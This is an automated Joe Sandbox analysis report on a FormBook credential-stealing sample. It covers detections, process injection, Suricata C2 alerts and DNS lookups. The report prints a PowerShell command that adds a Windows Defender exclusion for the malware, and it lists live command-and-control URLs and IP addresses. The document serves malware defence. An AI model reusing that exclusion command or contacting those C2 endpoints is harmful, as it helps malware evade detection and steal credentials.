Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ungziped_file.exe

Overview

General Information

Sample name:ungziped_file.exe
Analysis ID:1633496
MD5:6f13805c98ed6dda5477de5faeb268d2
SHA1:a97271661fc2232adef9e0bccdde338d7c1c5a0c
SHA256:d489cef2aa2d00dadb98bc10e6dc58dd4d2f43e33d089839a43eca2527b67fd1
Tags:exeuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Child Processes Of SndVol.exe
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • ungziped_file.exe (PID: 6292 cmdline: "C:\Users\user\Desktop\ungziped_file.exe" MD5: 6F13805C98ED6DDA5477DE5FAEB268D2)
    • powershell.exe (PID: 6604 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ungziped_file.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 5156 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • ungziped_file.exe (PID: 6648 cmdline: "C:\Users\user\Desktop\ungziped_file.exe" MD5: 6F13805C98ED6DDA5477DE5FAEB268D2)
    • ungziped_file.exe (PID: 6724 cmdline: "C:\Users\user\Desktop\ungziped_file.exe" MD5: 6F13805C98ED6DDA5477DE5FAEB268D2)
      • K1A8707LwM6.exe (PID: 764 cmdline: "C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\eRowTUp2uMcFB.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • SndVol.exe (PID: 2100 cmdline: "C:\Windows\SysWOW64\SndVol.exe" MD5: BD4A1CC3429ED1251E5185A72501839B)
          • K1A8707LwM6.exe (PID: 6128 cmdline: "C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\JBQ6QqyExLQU.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • firefox.exe (PID: 7148 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • svchost.exe (PID: 5880 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000010.00000002.3512102451.0000000005040000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000011.00000002.3514314819.00000000052F0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.1396809453.00000000010D0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000005.00000002.1393148021.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000010.00000002.3509810870.00000000032A0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            5.2.ungziped_file.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              5.2.ungziped_file.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ungziped_file.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ungziped_file.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ungziped_file.exe", ParentImage: C:\Users\user\Desktop\ungziped_file.exe, ParentProcessId: 6292, ParentProcessName: ungziped_file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ungziped_file.exe", ProcessId: 6604, ProcessName: powershell.exe
                Sigma detected: Powershell Defender Exclusion
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ungziped_file.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ungziped_file.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ungziped_file.exe", ParentImage: C:\Users\user\Desktop\ungziped_file.exe, ParentProcessId: 6292, ParentProcessName: ungziped_file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ungziped_file.exe", ProcessId: 6604, ProcessName: powershell.exe
                Sigma detected: Uncommon Child Processes Of SndVol.exe
                Source: Process startedAuthor: X__Junior (Nextron Systems): Data: Command: "C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\JBQ6QqyExLQU.exe" , CommandLine: "C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\JBQ6QqyExLQU.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe, NewProcessName: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe, OriginalFileName: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe, ParentCommandLine: "C:\Windows\SysWOW64\SndVol.exe", ParentImage: C:\Windows\SysWOW64\SndVol.exe, ParentProcessId: 2100, ParentProcessName: SndVol.exe, ProcessCommandLine: "C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\JBQ6QqyExLQU.exe" , ProcessId: 6128, ProcessName: K1A8707LwM6.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ungziped_file.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ungziped_file.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ungziped_file.exe", ParentImage: C:\Users\user\Desktop\ungziped_file.exe, ParentProcessId: 6292, ParentProcessName: ungziped_file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ungziped_file.exe", ProcessId: 6604, ProcessName: powershell.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 628, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5880, ProcessName: svchost.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-10T12:29:23.240625+010028554651A Network Trojan was detected192.168.2.1049691192.186.58.3180TCP
                2025-03-10T12:29:47.311808+010028554651A Network Trojan was detected192.168.2.104969692.60.36.19080TCP
                2025-03-10T12:30:39.620666+010028554651A Network Trojan was detected192.168.2.1049700188.114.97.380TCP
                2025-03-10T12:30:53.046505+010028554651A Network Trojan was detected192.168.2.1049704144.76.229.20380TCP
                2025-03-10T12:31:08.029327+010028554651A Network Trojan was detected192.168.2.1049708103.42.144.14280TCP
                2025-03-10T12:31:21.694047+010028554651A Network Trojan was detected192.168.2.104971213.248.169.4880TCP
                2025-03-10T12:31:34.930737+010028554651A Network Trojan was detected192.168.2.104971613.248.169.4880TCP
                2025-03-10T12:31:48.997119+010028554651A Network Trojan was detected192.168.2.1049720129.226.111.12280TCP
                2025-03-10T12:32:02.221350+010028554651A Network Trojan was detected192.168.2.104972584.32.84.3280TCP
                2025-03-10T12:32:15.561140+010028554651A Network Trojan was detected192.168.2.1049730192.64.118.22180TCP
                2025-03-10T12:32:28.942512+010028554651A Network Trojan was detected192.168.2.1049734198.187.31.21680TCP
                2025-03-10T12:32:43.718001+010028554651A Network Trojan was detected192.168.2.104973847.83.1.9080TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-10T12:29:39.669957+010028554641A Network Trojan was detected192.168.2.104969392.60.36.19080TCP
                2025-03-10T12:29:42.236524+010028554641A Network Trojan was detected192.168.2.104969492.60.36.19080TCP
                2025-03-10T12:29:44.755640+010028554641A Network Trojan was detected192.168.2.104969592.60.36.19080TCP
                2025-03-10T12:29:53.883736+010028554641A Network Trojan was detected192.168.2.1049697188.114.97.380TCP
                2025-03-10T12:29:56.430795+010028554641A Network Trojan was detected192.168.2.1049698188.114.97.380TCP
                2025-03-10T12:29:58.981191+010028554641A Network Trojan was detected192.168.2.1049699188.114.97.380TCP
                2025-03-10T12:30:45.344968+010028554641A Network Trojan was detected192.168.2.1049701144.76.229.20380TCP
                2025-03-10T12:30:47.897961+010028554641A Network Trojan was detected192.168.2.1049702144.76.229.20380TCP
                2025-03-10T12:30:50.487038+010028554641A Network Trojan was detected192.168.2.1049703144.76.229.20380TCP
                2025-03-10T12:31:00.087481+010028554641A Network Trojan was detected192.168.2.1049705103.42.144.14280TCP
                2025-03-10T12:31:02.698050+010028554641A Network Trojan was detected192.168.2.1049706103.42.144.14280TCP
                2025-03-10T12:31:05.284159+010028554641A Network Trojan was detected192.168.2.1049707103.42.144.14280TCP
                2025-03-10T12:31:13.890073+010028554641A Network Trojan was detected192.168.2.104970913.248.169.4880TCP
                2025-03-10T12:31:16.592684+010028554641A Network Trojan was detected192.168.2.104971013.248.169.4880TCP
                2025-03-10T12:31:19.125917+010028554641A Network Trojan was detected192.168.2.104971113.248.169.4880TCP
                2025-03-10T12:31:27.268982+010028554641A Network Trojan was detected192.168.2.104971313.248.169.4880TCP
                2025-03-10T12:31:29.802311+010028554641A Network Trojan was detected192.168.2.104971413.248.169.4880TCP
                2025-03-10T12:31:32.375883+010028554641A Network Trojan was detected192.168.2.104971513.248.169.4880TCP
                2025-03-10T12:31:41.251816+010028554641A Network Trojan was detected192.168.2.1049717129.226.111.12280TCP
                2025-03-10T12:31:43.790577+010028554641A Network Trojan was detected192.168.2.1049718129.226.111.12280TCP
                2025-03-10T12:31:46.428961+010028554641A Network Trojan was detected192.168.2.1049719129.226.111.12280TCP
                2025-03-10T12:31:54.582326+010028554641A Network Trojan was detected192.168.2.104972184.32.84.3280TCP
                2025-03-10T12:31:57.135568+010028554641A Network Trojan was detected192.168.2.104972284.32.84.3280TCP
                2025-03-10T12:31:59.693529+010028554641A Network Trojan was detected192.168.2.104972484.32.84.3280TCP
                2025-03-10T12:32:07.877338+010028554641A Network Trojan was detected192.168.2.1049727192.64.118.22180TCP
                2025-03-10T12:32:10.458729+010028554641A Network Trojan was detected192.168.2.1049728192.64.118.22180TCP
                2025-03-10T12:32:13.015428+010028554641A Network Trojan was detected192.168.2.1049729192.64.118.22180TCP
                2025-03-10T12:32:21.309958+010028554641A Network Trojan was detected192.168.2.1049731198.187.31.21680TCP
                2025-03-10T12:32:24.406079+010028554641A Network Trojan was detected192.168.2.1049732198.187.31.21680TCP
                2025-03-10T12:32:26.408163+010028554641A Network Trojan was detected192.168.2.1049733198.187.31.21680TCP
                2025-03-10T12:32:35.572269+010028554641A Network Trojan was detected192.168.2.104973547.83.1.9080TCP
                2025-03-10T12:32:38.120224+010028554641A Network Trojan was detected192.168.2.104973647.83.1.9080TCP
                2025-03-10T12:32:40.665733+010028554641A Network Trojan was detected192.168.2.104973747.83.1.9080TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://www.82765.ltd/extg/?lJ5XsHT=FWqvS2oQh4eVVjLTwqHOiP1/ZDahyJOFPrLBskdMkfQ4EQGcFlX+4xYLIEJWX9Ikcmr6BUKh66LrzwmKZjSBvM+s0cQ6GZ0SyzALVkZ6YWBvCGXcxA==&qRn=in70LLMxeJEAvira URL Cloud: Label: phishing
                Source: http://www.031235246.xyz/an37/?lJ5XsHT=EOo17e0b13RAPxLblUgE3vs/FGL0H2xQV++ddtKGVI4dgn5cY1anvW0mUjQ935dHimnK6XuAvySysVP8xdezbz8F+SECfhZPlRZkAyQ7l3udob86xw==&qRn=in70LLMxeJEAvira URL Cloud: Label: malware
                Source: http://www.gnlokn.info/1hqx/?lJ5XsHT=ZLrw+Pq3MAwYsBOK5aec2k9VcgoVTWhUmUFDAd6oEVMHtXmwVeeiiz1QtAZkDwNggiXkqMWrizc2pYhIMWZKSKpIcV1JHS4R90wxBwHFuk78kAQCAA==&qRn=in70LLMxeJEAvira URL Cloud: Label: malware
                Source: http://www.fluffymooncat.fun/72e1/?lJ5XsHT=GAwPJ2y3utP2ohmBjxJQ4YKR4a5ZSZwwUjgEd0RFRLhwJQk7ldoPr0N9YZF0OFh8/8cxs0GCaqpBUanGilFHUrd1+LLzaEdk0in9+JAQ7h4qhpgqGg==&qRn=in70LLMxeJEAvira URL Cloud: Label: malware
                Source: http://www.gnlokn.info/1hqx/Avira URL Cloud: Label: malware
                Multi AV Scanner detection for submitted file
                Source: ungziped_file.exeVirustotal: Detection: 38%Perma Link
                Source: ungziped_file.exeReversingLabs: Detection: 50%
                Yara detected FormBook
                Source: Yara matchFile source: 5.2.ungziped_file.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.ungziped_file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000010.00000002.3512102451.0000000005040000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.3514314819.00000000052F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1396809453.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1393148021.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.3509810870.00000000032A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.3512178205.0000000005090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1400004101.0000000001600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.3512080555.0000000002590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Joe Sandbox ML detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                Source: ungziped_file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: ungziped_file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: SndVol.pdbGCTL source: K1A8707LwM6.exe, 0000000F.00000002.3510669412.00000000007CE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: ungziped_file.exe, 00000005.00000002.1397449431.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000010.00000003.1401922869.000000000504E000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3512354987.0000000005200000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3512354987.000000000539E000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000010.00000003.1393117076.0000000004E9B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: ungziped_file.exe, ungziped_file.exe, 00000005.00000002.1397449431.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, SndVol.exe, 00000010.00000003.1401922869.000000000504E000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3512354987.0000000005200000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3512354987.000000000539E000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000010.00000003.1393117076.0000000004E9B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: SndVol.pdb source: K1A8707LwM6.exe, 0000000F.00000002.3510669412.00000000007CE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: K1A8707LwM6.exe, 0000000F.00000000.1319299130.0000000000CEF000.00000002.00000001.01000000.0000000C.sdmp, K1A8707LwM6.exe, 00000011.00000002.3510839344.0000000000CEF000.00000002.00000001.01000000.0000000C.sdmp
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_032BC7E0 FindFirstFileW,FindNextFileW,FindClose,16_2_032BC7E0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 4x nop then xor eax, eax16_2_032A9F10
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 4x nop then mov ebx, 00000004h16_2_055504DE

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49700 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49698 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49718 -> 129.226.111.122:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49693 -> 92.60.36.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49695 -> 92.60.36.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49710 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49709 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49733 -> 198.187.31.216:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49738 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49712 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49737 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49715 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49703 -> 144.76.229.203:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49702 -> 144.76.229.203:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49691 -> 192.186.58.31:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49727 -> 192.64.118.221:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49728 -> 192.64.118.221:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49696 -> 92.60.36.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49734 -> 198.187.31.216:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49707 -> 103.42.144.142:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49704 -> 144.76.229.203:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49694 -> 92.60.36.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49708 -> 103.42.144.142:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49699 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49719 -> 129.226.111.122:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49731 -> 198.187.31.216:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49724 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49725 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49697 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49713 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49714 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49701 -> 144.76.229.203:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49706 -> 103.42.144.142:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49711 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49721 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49705 -> 103.42.144.142:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49729 -> 192.64.118.221:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49722 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49717 -> 129.226.111.122:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49720 -> 129.226.111.122:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49732 -> 198.187.31.216:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49735 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49730 -> 192.64.118.221:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49716 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49736 -> 47.83.1.90:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.031235246.xyz
                Source: DNS query: www.autonomousrich.xyz
                Source: DNS query: www.matindi.xyz
                Source: DNS query: www.ticquan.xyz
                Source: DNS query: www.infiniteture.xyz
                Source: Joe Sandbox ViewIP Address: 144.76.229.203 144.76.229.203
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
